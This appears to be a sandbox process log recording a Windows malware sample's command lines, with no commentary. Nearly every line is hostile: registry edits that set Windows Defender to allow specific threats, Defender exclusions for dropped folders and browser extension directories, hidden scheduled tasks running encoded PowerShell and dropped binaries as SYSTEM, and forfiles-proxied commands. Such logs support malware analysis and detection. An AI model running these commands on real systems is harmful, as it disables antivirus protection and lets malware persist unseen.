C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBNVCDjWJ" /SC once /ST 01:28:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBNVCDjWJ"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBNVCDjWJ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:15:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe\" y7 /tRofdidjO 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "WKALCIrwIEiqhKBsn"

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe y7 /tRofdidjO 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 232 -ip 232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 1052

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\xwzecB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

